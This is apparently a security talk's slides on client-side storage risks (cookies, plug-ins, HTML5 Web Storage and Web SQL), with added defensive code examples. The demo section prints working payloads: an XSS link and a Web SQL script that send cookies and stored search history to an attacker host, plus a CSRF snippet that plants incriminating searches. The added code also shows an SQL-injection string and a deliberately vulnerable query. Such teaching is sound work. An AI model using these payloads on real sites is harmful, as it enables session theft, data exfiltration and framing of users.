The Risks of Client-Side Data Storage
From cookie to database
Agenda
Client-Side Data Storage (CSDS):
▪ What it is
▪ Why it’s used
▪ How it’s implemented
▪ Demo – SecurSearch Search Engine
▪ What the risks are
CSDS – What it is
Storage of information on the PC of a user:
▪ Initiated by a website
▪ Performed by the browser or a browser plug-in
▪ Not necessarily noticed by the user
▪ Stored for an hour, a day, a month, or forever …
▪ Just some bytes, kilobytes, or megabytes
CSDS – Why it’s used
▪ Session fixation
▪ Server fixation (load balancing)
▪ User tracking / profiling
▪ Statistics
▪ Performance
▪ Offline web application support
▪ User configuration / preferences
CSDS – How it’s implemented (pre HTML 5)
Mechanism              Default size  Description
Cookies                80 KB         Small text files
IE User Data           640 KB        XML-files
Adobe Flash            100 KB        LocalSharedObjects
Oracle Java            ?             Apache Derby DB
Microsoft Silverlight  1 MB          XML-files
Google Gears           ?             SQLite database; development stopped in 2010, superseded by HTML 5 Web SQL Database
CSDS – How it’s implemented (cookies)
Set-Cookie: VISITORID=ES1q4PWZ1A12O7jlpWpsi19sji8yhX8s7HX92; expires=Sun, 15-Nov-2011 14:50:38 GMT; path=/; domain=.secblog.nl; HttpOnly
Set-Cookie: SESSIONID=c22as11qr2921aa5:WI=1372122210: PWO=PQ1rpFf0DcYS01S2; expires=Thu, 15-Nov-2011 14:50:38 GMT; path=/; domain=.secblog.nl
With domain=.secblog.nl, both cookies are sent to every host under secblog.nl:
www.secblog.nl, stats.secblog.nl, login.secblog.nl, rss.secblog.nl, redirect.secblog.nl, video.secblog.nl, search.secblog.nl, …
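The two Set-Cookie headers above are worth reading attribute by attribute: neither carries Secure, only VISITORID carries HttpOnly, and both are scoped to the whole secblog.nl domain. The following is an added example, not code from the slides: a small parser for a Set-Cookie header value and an audit function that reports these points. The audit rules are a constructed illustration, and the two header strings are copied from the slide.

```javascript
// Added example (not from the slides): parse a Set-Cookie header value into its
// attributes and report what a defender would check. The two header values are
// the ones shown above; the audit rules are a constructed illustration.

const VISITOR_HEADER =
  'Set-Cookie: VISITORID=ES1q4PWZ1A12O7jlpWpsi19sji8yhX8s7HX92; ' +
  'expires=Sun, 15-Nov-2011 14:50:38 GMT; path=/; domain=.secblog.nl; HttpOnly';
const SESSION_HEADER =
  'Set-Cookie: SESSIONID=c22as11qr2921aa5:WI=1372122210: PWO=PQ1rpFf0DcYS01S2; ' +
  'expires=Thu, 15-Nov-2011 14:50:38 GMT; path=/; domain=.secblog.nl';

function parseSetCookie(header) {
  // Accept either the bare header value or the full "Set-Cookie: ..." line.
  const body = header.replace(/^set-cookie:\s*/i, '');
  const parts = body.split(';').map((p) => p.trim()).filter(Boolean);
  const eqName = parts[0].indexOf('=');
  const cookie = {
    name: eqName === -1 ? parts[0] : parts[0].slice(0, eqName).trim(),
    value: eqName === -1 ? '' : parts[0].slice(eqName + 1),
    attributes: {},
  };
  // Attribute names are case-insensitive; flags without "=" are stored as true.
  for (const attr of parts.slice(1)) {
    const eq = attr.indexOf('=');
    const key = (eq === -1 ? attr : attr.slice(0, eq)).trim().toLowerCase();
    cookie.attributes[key] = eq === -1 ? true : attr.slice(eq + 1).trim();
  }
  return cookie;
}

// sessionNames lists cookie names that carry a session, so that a session
// cookie written to disk with an Expires date can be flagged.
function auditCookie(header, sessionNames = []) {
  const cookie = parseSetCookie(header);
  const a = cookie.attributes;
  const findings = [];
  if (!('secure' in a)) findings.push('no Secure flag: also sent over plain http');
  if (!('httponly' in a)) findings.push('no HttpOnly flag: readable through document.cookie (XSS / csXSS)');
  if (typeof a.domain === 'string') {
    // A Domain attribute always covers the domain itself and every host below it.
    const d = a.domain.replace(/^\./, '');
    findings.push('Domain=' + a.domain + ': sent to every host under ' + d);
  }
  if (sessionNames.includes(cookie.name) && 'expires' in a) {
    findings.push('session cookie with Expires: persists on disk after the browser closes');
  }
  return { cookie, findings };
}
```

Run against the slide's headers, VISITORID yields two findings (no Secure, domain-wide scope) and SESSIONID four (no Secure, no HttpOnly, domain-wide scope, and a persistent session cookie), which is exactly the combination the csXSS demo later relies on.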
CSDS – How it’s implemented (Same Origin Policy)
Origin of http://www.x.nl:
• Host: www.x.nl
• Protocol: http
• Port: 80 (implicit)
Not the same origin:
• https://www.x.nl (different protocol)
• http://www.x.nl:82 (different port)
• http://ww.x.nl (different host)
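The origin comparison above is strict on all three parts, including the port that is only implied by the URL, while cookie scoping (the previous slide) is a suffix match on the host name that ignores protocol and port. The following is an added example, not code from the slides, that makes both rules explicit; the URLs are the slide's own and the functions are constructed for illustration.

```javascript
// Added example (not from the slides): the (protocol, host, port) triple the
// Same Origin Policy compares, with the implicit default port filled in, next to
// the looser suffix matching cookies use for their Domain attribute.

const DEFAULT_PORTS = { 'http:': '80', 'https:': '443' };

function originOf(urlString) {
  const u = new URL(urlString);
  // URL.port is '' when the port is implicit, so substitute the scheme default.
  return {
    protocol: u.protocol,
    host: u.hostname,
    port: u.port || DEFAULT_PORTS[u.protocol] || '',
  };
}

// Returns [] when the origins match, otherwise the names of the differing parts.
function originDifferences(a, b) {
  const oa = originOf(a);
  const ob = originOf(b);
  return ['protocol', 'host', 'port'].filter((k) => oa[k] !== ob[k]);
}

function sameOrigin(a, b) {
  return originDifferences(a, b).length === 0;
}

// Cookie domain matching (RFC 6265): a Domain attribute matches the host itself
// and every host below it, and protocol and port play no part at all.
function cookieDomainMatches(requestHost, cookieDomain) {
  const d = cookieDomain.replace(/^\./, '').toLowerCase();
  const h = requestHost.toLowerCase();
  return h === d || h.endsWith('.' + d);
}
```

Note that changing only the scheme to https changes two parts of the origin, protocol and implied port, whereas a cookie with domain=.secblog.nl reaches stats.secblog.nl and login.secblog.nl alike.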
CSDS – How it’s implemented (JavaScript)
JavaScript is used to manage most of these mechanisms
CSDS – How it’s implemented (plug-in support)
▪ Gears – 6,2%
▪ Silverlight – 52,9%
▪ Java – 79,4%
▪ Flash – 96,8%
Source: StatOwl Statistics April 2010 – September 2010 (www.statowl.com)
CSDS – How it’s implemented (HTML 5 storage)
▪ Web Storage: name/value pairs; LocalStorage and SessionStorage
▪ Web SQL Database: full client-side DB with query support, based on SQLite; probably replaced by IndexedDB
▪ Indexed Database: use of indexes; endorsed by Microsoft and Mozilla
CSDS – How it’s implemented (browser support)
Support matrix (five browser columns, unlabeled; D = supported, U = not supported):
HTML5          Web Storage            D D D D D
               Web SQL Database       U U D D D
               Indexed Database API   U U U U U
“Traditional”  IE UserData            D U U U U
               Microsoft Silverlight  D D D D D
               Google Gears           D D U D D
               Adobe Flash            D D D D D
               Cookies                D D D D D
csXSS
<iframe width=0 height=0 src='/hack1_script.html'></iframe>
<script>document.location='http://www.secursearch.com/index.pl?q=%3C%2Fa%3E%3Ca+href%3D%22%22+onmouseover%3D%22javascript%3Adocument.location%3D%27http%3A%2F%2Fwww.ihackedsecursearch.com%2Fhack1.pl%3F%27+%2B+document.cookie%3B%22%3Ehaha move your mouse%3C%2Fa%3E';</script>
Decoded q parameter:
</a><a href="" onmouseover="javascript:document.location='http://www.ihackedsecursearch.com/hack1.pl?' + document.cookie;">haha move your mouse</a>
csXSS / XSS
<script>
if (window.openDatabase) {
  var db = openDatabase("secursearch_db", "1.0", "Web SQL Database", 2097152);
  db.transaction(function (tx) {
    tx.executeSql("SELECT * FROM search_terms", [], function (tx, results) {
      var stroutput = "";
      for (i = 0; i < results.rows.length; i++) {
        stroutput = stroutput + results.rows.item(i)["term"] + "***";
      }
      document.getElementById("feedback").innerHTML = "<img width=1 height=1 src=http://www.ihackedsecursearch.com/register.pl?history=" + stroutput + ">";
    });
  });
}
</script>
XSS
Open database:
  var db = openDatabase("secursearch_db", "1.0", "Web SQL …
Load search term table:
  tx.executeSql("SELECT * FROM search_terms", [], …
Read contents of table:
  for (i = 0; i < results.rows.length; i++) { stroutput = stroutput + results.rows.item(i)["term"] + "***"; }
Send the contents to a remote host via an image request:
  document.getElementById("feedback").innerHTML = "<img width=1 height=1 src=http://www.ihackedsecursearch.com/register.pl?history=" + stroutput + ">";
CSRF
search[0] = 'how to hack ministry of internal affairs';
search[1] = 'blackmailing the minister';
search[2] = 'found backdoor in ministry website';
framehandle.src = 'http://www.secursearch.com/index.pl?q=' + search[0];
framehandle.src = 'http://www.secursearch.com/index.pl?q=' + search[1];
framehandle.src = 'http://www.secursearch.com/index.pl?q=' + search[2];
CSDS – What the risks are (technical issues)
▪ Cross-Site Scripting (XSS)
▪ Client-side XSS (csXSS)
▪ Client-side SQL injection (csSQLi)
▪ Browser vulnerabilities / shortcomings:
− incomplete deletion of data (e.g. plug-in data)
▪ User access to data (integrity issues)
Source: WhiteHat Website Security Statistic Report - Fall 2010, Sep 22, 2010
CSDS – What the risks are (technical issues)
▪ Same origin policy issues:
− Browser vulnerabilities
− (cs)XSS
− Freedom in domain name
− DNS cache poisoning
− Shared servers
▪ No expiration on client-side data
▪ Use of immature technology
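Two of the risks listed above, "No expiration on client-side data" and (from the developer advice later in the deck) not trusting locally stored data, can be addressed in the same place: a thin wrapper over Web Storage. The following is an added example, not code from the slides. It assumes a Storage-like object with the standard getItem/setItem/removeItem/key/length interface; MemoryStorage is a constructed stand-in so the code runs outside a browser, and in a page you would pass window.localStorage instead.

```javascript
// Added example (not from the slides): Web Storage entries never expire on
// their own, so this wrapper stores each value with an expiry time and treats
// expired or unparsable entries as absent. MemoryStorage is a constructed
// stand-in for window.localStorage with the same interface.

class MemoryStorage {
  constructor() { this.map = new Map(); }
  get length() { return this.map.size; }
  key(i) { return Array.from(this.map.keys())[i] ?? null; }
  getItem(k) { return this.map.has(k) ? this.map.get(k) : null; }
  setItem(k, v) { this.map.set(k, String(v)); }
  removeItem(k) { this.map.delete(k); }
}

class ExpiringStorage {
  // `now` is injectable so expiry can be exercised without waiting for time to pass.
  constructor(backing, prefix = 'exp:', now = () => Date.now()) {
    this.backing = backing;
    this.prefix = prefix;
    this.now = now;
  }

  set(key, value, ttlMs) {
    const record = { v: value, e: this.now() + ttlMs };
    this.backing.setItem(this.prefix + key, JSON.stringify(record));
  }

  // Reads one raw entry. Stored data is untrusted input: anything that is not
  // a record we wrote, or that has expired, is removed and reported as absent.
  read(fullKey) {
    const raw = this.backing.getItem(fullKey);
    if (raw === null) return null;
    let record = null;
    try { record = JSON.parse(raw); } catch (err) { /* not JSON: treat as junk */ }
    if (!record || typeof record !== 'object' || typeof record.e !== 'number' || record.e <= this.now()) {
      this.backing.removeItem(fullKey);
      return null;
    }
    return record;
  }

  get(key) {
    const record = this.read(this.prefix + key);
    return record === null ? null : record.v;
  }

  // Removes every expired or malformed entry under our prefix; returns the count.
  // Keys are collected first because removing while iterating shifts key(i).
  purge() {
    const keys = [];
    for (let i = 0; i < this.backing.length; i++) {
      const k = this.backing.key(i);
      if (k !== null && k.startsWith(this.prefix)) keys.push(k);
    }
    let removed = 0;
    for (const k of keys) {
      if (this.read(k) === null) removed++;
    }
    return removed;
  }
}
```

Calling purge() on page load (and set() with a short TTL for anything sensitive) gives data a lifetime even though the underlying store has none; the parse-and-validate step in read() is what "don't trust locally stored data" looks like in practice.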
Example: user sites on a shared server
mad-fred.secblog.nl, crazy-daisy.secblog.nl, maniac-jack.secblog.nl
www.secblog.nl/~mad-fred, www.secblog.nl/~crazy-daisy, www.secblog.nl/~maniac-jack
CSDS – What the risks are (incomplete deletion)
Deletion matrix (five browser columns, unlabeled; D = deleted, U = not deleted):
HTML5          Web Storage / Web SQL Database / Indexed Database API   U D D U D U D D D
“Traditional”  IE UserData            D
               Microsoft Silverlight  U U U U U
               Google Gears           U U U U
               Adobe Flash            U U U U U
               Cookies                D D D D D
LocalStorage: D   SessionStorage: U
Plug-in data is never deleted!
CSDS – What the risks are (damage -- user)
▪ Profiling / user tracking (privacy issues)
▪ Data leakage (also privacy issues)
CSDS – What the risks are (damage -- organization)
▪ Application logic influenced:
− Authentication bypass (e.g. cookie theft)
− Use of corrupted client data by the web application
CSDS – What the risks are (legal action)
Source: Ars Technica, Jacqui Cheng, Aug 16, 2010
CSDS – What the risks are (legal action)
Source: Wired, Ryan Singel, Jul 27, 2010
Agenda
Client-Side Data Storage:
▪ What it is
▪ Why it’s used
▪ How it’s implemented
▪ Demo
▪ What the risks are
▪ What you should do about it
Cartoon: Geek & Poke, Oliver Widder, Sep 20, 2010
CSDS – What you should do about it (as a user)
Image: Miguel Fernandez, gegen-den-strich.com
▪ Delete your client-side data frequently
▪ Restrict the information you give away
▪ Harden your browser
− Selectively block JavaScript
− Block third-party storage
− Delete data automatically
− Disable HTML5 storage (for now)
− Use white- and blacklists
CSDS – What you should do about it (as a developer)
▪ Decide if you need local storage anyway
▪ Describe your privacy policy (be open)
▪ Prepare your webapp for ‘no data’ systems
▪ Don’t trust locally stored data
CSDS – What you should do about it (as a developer)
▪ Take XSS vulnerabilities very seriously (or better, … prevent them!)
▪ Use placeholders for SQL statements (to prevent Client-Side SQL Injection)
▪ Don’t use HTML5 storage mechanisms yet in production (and especially not on shared servers!)
Vulnerable (string concatenation):
tx.executeSql("INSERT INTO table (field) VALUES ('" + strID + "')");
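The concatenated INSERT above is the client-side SQL injection case, and the demo's Web SQL payload showed the matching output-side problem: rows read back from storage were written straight into innerHTML. The following is an added example, not code from the slides or from SecurSearch. It places the placeholder form of the statement beside the vulnerable one and adds an escaping renderer for data read back from storage. Web SQL is not available outside a browser, so recordingTx is a constructed stand-in that records what executeSql would send; the search_terms table name comes from the demo, and HOSTILE_TERM is a constructed input.

```javascript
// Added example (not from the slides): the concatenated INSERT beside its
// placeholder form, run against a constructed stand-in for a Web SQL
// transaction that only records the statement and arguments it would send,
// plus an HTML-escaping renderer for rows read back from client-side storage.

function recordingTx() {
  const calls = [];
  return {
    calls,
    // Same (sql, args, onSuccess) shape as Web SQL's tx.executeSql, minus the DB.
    executeSql(sql, args = [], onSuccess) {
      calls.push({ sql, args });
      if (onSuccess) onSuccess(this, { rows: { length: 0, item: () => null } });
    },
  };
}

// Vulnerable form (as on the slide): the input becomes part of the SQL text, so a
// quote in it ends the string literal and whatever follows is parsed as SQL.
function insertTermUnsafe(tx, strID) {
  tx.executeSql("INSERT INTO search_terms (term) VALUES ('" + strID + "')");
}

// Placeholder form: the SQL text is a constant and the value travels as a
// separate argument, so the database can only ever treat it as a value.
function insertTerm(tx, strID) {
  tx.executeSql('INSERT INTO search_terms (term) VALUES (?)', [strID]);
}

const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}

// Builds display markup for terms read back from storage. Every term is
// escaped, so a stored "<img ...>" is shown as text instead of becoming an element.
function renderTerms(terms) {
  return '<ul>' + terms.map((t) => '<li>' + escapeHtml(t) + '</li>').join('') + '</ul>';
}

// Constructed hostile input: a closing quote followed by a second statement.
const HOSTILE_TERM = "x'); DELETE FROM search_terms; --";

// Runs both forms with the same input and returns what each would send.
function compare(term = HOSTILE_TERM) {
  const unsafeTx = recordingTx();
  insertTermUnsafe(unsafeTx, term);
  const safeTx = recordingTx();
  insertTerm(safeTx, term);
  return {
    unsafeSql: unsafeTx.calls[0].sql,
    safeSql: safeTx.calls[0].sql,
    safeArgs: safeTx.calls[0].args,
  };
}
```

With the placeholder form the statement text never changes, whatever the input; with the concatenated form the second statement is part of the SQL. The same split applies on output: build elements or escape text, never concatenate stored strings into innerHTML.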
Conclusions
Most of the threats are not new
Server-side threats turn into client-side threats (csXSS, csSQLi)
Conclusions
▪ Biggest challenges are:
− the growing amount of information on clients
− how about data integrity?
− how about data confidentiality?
− plug-ins that cannot be controlled
▪ As an organization, make a distinction between:
− threats to your users
Thank you for your time!